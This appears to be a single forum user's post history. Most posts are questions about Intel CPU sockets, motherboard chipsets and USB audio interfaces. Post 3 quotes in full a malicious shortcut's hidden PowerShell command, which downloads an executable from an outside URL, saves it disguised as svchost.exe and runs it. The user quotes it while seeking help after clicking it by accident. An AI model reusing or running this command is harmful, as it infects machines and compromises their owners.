  1. Okay downloading now, Malwarebytes turned up nothing also.
  2. Deleted the file, I don't think it was running, scanning now with TDSS killer, thanks for your quick reply. EDIT: Nothing was found with TDSS killer. Anything else I could do to double check everythings A-OK?
  3. Yep it's a .lnk file. The target box has this written in it... C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cdn.che.moe/kyvept.exe','%APPDATA%\svchost.exe');Start-Process '%APPDATA%\svchost.exe' I browse 4chan, am I screwed?
  4. Hello all. I found a zipped video file on my iPhone, don't remember downloading it, inside was a file with the extension of shortcut, the shortcut leads to Windows PowerShell, long story short I double clicked the shortcut by accident, nothing seemed to happen but my harddrive made some noise like it was doing something, I'm suspecting the worst at the moment but was wondering, how do I see what the shortcut did? Could it have run something on my computer? I'm presuming whatever it was, it wasn't good. Thanks in advance.
  5. I'd love something like this for my parents, I set up a PS3 for them to watch Netflix and YouTube and stuff, and with play TV they can record shows they might otherwise miss, a tiny little PC like this would be an ideal upgrade for them now that support for the PS3 is winding down.
  6. Thank you so much, I think I understand a lot better now. So, it would be pointless buying a 6700 and a Z170? and just as pointless buying a 6700K and an H170? It was this video I was looking at... It's the improved single threaded performance and similar gaming performance that's edging me to the 6700K/6700, as I don't do any video encoding or heavy compression/file conversion work, I think the extra horsepower of a 6 core would largely be wasted for my usage?
  7. Ahhh, that makes sense, thanks I don't think I need the extra cores and I definitely don't need the extra PCI-Express lanes. Can you shed any light on the difference between the motherboard chipsets? I see B150, H110, H170, and Z170 for 1151, presumably the higher number/letter combos have more features, but is that the only difference?
  8. As yet undecided, I think I would just like to pick the parts and save, rather than have a budget and build around that, although that being said, I can't imagine I'll be wanting to spend more than £700-£800 in one go. Id really like to buy a no compromise motherboard processor and ram, and then either compromise on a graphics card or use my old one and save for a new one. So with the numbers denoting the number of pins, what's the deal with the Haswell Enthusiast having so many more? Are they the go-to processors for gaming generally speaking?
  9. Thanks! That actually helps a lot. As does this! Thank you, it seems to make a lot more sense now! So, would I be right in assuming that Broadwell was the next generation of processors after Haswell, but just using the same socket?
  10. Hello. I live in the UK and have decided it's time to build a new PC, however I am really stuck on processor and motherboard options. I've always used AMD processors but have decided to switch to Intel and I just do...not...get their naming scheme. From Linus' videos I've learnt that Core i7's generally represent the best processor for a given socket, and this is where I've ran into problems. Upon visiting Scan to price up new parts, and having decided on an i7, I am greeted with: Core i7 - Socket 1150 (Broadwell) Core i7 - Socket 1150 (Haswell) Core i7 - Socket 1151 (Skylake) Core i7 - Socket 2011-3 (Haswell Enthusiast) Wait, what? What do the numbers mean? What do the names mean? I consider myself a pretty tech savvy guy but I just cannot get my head around these. Which is the latest one? Which is the best one for gaming? What's the difference between an 1150 Broadwell and an 1150 Haswell? And in the future how do I decode these names and socket numbers to determine which is the latest and greatest/best solution for me? After watching Luke's video on the 5820K vs the 6700K, I'm pretty sure a 6700K is what I'm after, I plan to do gaming and web browsing, and I play a lot of sim games that can be processor intensive, and in the case of FSX, single core performance matters, but I'd like to know if there is a better option, and how do I discern a better option from the names above? I think I understand the actual processor names, as in the numbers representing the series and the K suffix representing an unlocked core multiplier etc, but socket choice is where I'm having real difficulty understanding. The other question I have is about motherboards, again when looking at Scan.co.uk I am greeted with an overwhelming list of choices, from 1151 B150 to 1151 Z170. I think I understand the size differences within a given chipset, I'm assuming that a bigger board will have more PCi slots, more room for ram, more USB slots (right?) but I do not understand the letter and number combination for a chipset, is it simply a case of a higher letter and number meaning better/newer? Any explanation or links to relevant info would be greatly appreciated. PS: While I'm here I wonder if anyone could recommend an appropriate motherboard and processor, perhaps ram too. I use my computer almost exclusively for gaming and maybe some web browsing and movie watching, but gaming performance, really is key. I don't think ram affects gaming performance too much but I certainly don't want it to be a bottleneck, I think 16gb is plenty, I just want it to be fast. And lots of USB slots would also be great, I have a lot of peripherals that sometimes don't play nice with a hub. I think that's everything, I have an AX1200i power supply so power shouldn't be an issue, and I don't plan on having SLI, just a single 980/980ti depending on how much everything else comes to. Thank you very much in advance for any help, it is very much appreciated.
  11. Alright guys, I went for the Tascam, for an extra £10 it offered quite a lot over the 2i2, the optical input could be quite useful for a playstation or something like that, either way I felt it was more versatile in the long run. Thanks for all the help.
  12. Sweet, thanks for replying! I don't have Skype sorry but if I have any questions about the 2i2 then I'll definitely message you! Thank you. Okay, last question I promise... For an extra £10, I could get this... http://www.scan.co.uk/products/tascam-us-366-usb-audio-interface Which seems to do everything the 2i2 does plus more, it comes with software, has more inputs and outputs, 192khz over 96khz, it just seems better in every way... Am I missing something? I obviously don't want to be paying for extra features I'll never use but, for an extra £10 is it worth the extra headroom? EDIT: Just to clarify, I'm not a recording artist, the mic will be used pretty much exclusively to talk to people while in games or VOIP, and maybe, just maybe I might experiment with a podcast or youtube videos down the line, any guitar recording that may or may not happen will be for personal use, I won't be recording anything professionally or anything like that, and I highly doubt I'll ever want to output to anything other than my monitors and a pair of headphones.
  13. My mistake! Replied quickly before heading to bed last night. I googled it, it looks a tiny bit overkill for my usage, but thanks! Thanks! That puts my mind to rest a little, something I'm always worried about when buying pretty much anything for my computer is are the connectors compatible. Couple more quick questions... http://www.scan.co.uk/products/focusrite-audio-engineering-scarlett-2i2-audio-interface-96-khz-24bit This is pretty much exactly what I'm looking for (Thanks bchampion96), but I was wondering, if in the future I decide to use input number 2, for something that doesn't require phantom power, will having it turned on (for the mic on input 1) damage or otherwise affect the signal at all? I play guitar and having the opportunity to record that at the same time as the microphone is quite appealing to me. Second question is, are the outputs on the back (the TRS) balanced? EDIT: Found my answer here - http://www.fullcompass.com/common/files/18487-scarlett-2i2-user-guide1.pdf "The line output connectors are 3-pole (TRS) ¼” (6.35 mm) jack sockets, and are electronically balanced" And thirdly, potentially silly question but I'd just like to make sure, if I connect this to my PC with the USB, and then only have the two outputs on the back going to my monitors, with no other inputs or outputs at all, will I be able to hear my music/games from my PC? In other words, will sound travel from the PC to the monitors through the USB? Or will I need a separate output from the PC into the interface?
  14. Sweet! Cheers man! Yeah I forgot to mention I'm looking at spending about £100 on an interface, so that 2i2 fits nicely. Do you know of any interfaces like that, that would output with XLR? Is there even a difference between the TRS and XLR? I'm currently connected to the motherboards on-board sound via a 1/4 to 3.5mm adapter, then the cable is a 1/4 inch jack to split left and right XLR connectors. What are the advantages and disadvantages to having XLR, TRS, Mono L&R or split stereo L&R? Are there even any differences at all?
  15. Hello. Brand new to the forums so forgive any transgressions on my part. I've read the FAQ and watch the whole video, but to honest I'm still a little confused. I have a pair of ADAM Artist 5 monitors on a set of IsoAcoustic stands, but I would like to start expanding with some other gear. Eventually I would like these speakers, a pair of high quality headphones, and a high quality microphone (I've decided against having a headset, because I feel it's hard to find headphones with a good mic that sound good, or headphones that sound good that also have a good mic) This is the microphone I was looking at, if not this model then something pretty similar. http://www.scan.co.uk/products/mxl-990-pressure-gradient-condenser-microphone My problem comes from needing something to plug all of these things into, I was originally going to buy a sound card, but with the microphone I want I'm going to need something that accepts XLR and has phantom power. Ideally, I would like something with L and R XLR output for my speakers (so that they're balanced), a 1/4 inch TRS output for a pair of headphones, and a phantom power XLR input for the microphone. These are what I was looking at... http://www.scan.co.uk/shop/pro-audio/all/interfaces/usb-audio-interfaces But I don't really know what I'm looking for, does anyone have any suggestions? Anything I need to be aware of? Anything I'm missing? Thanks in advance.
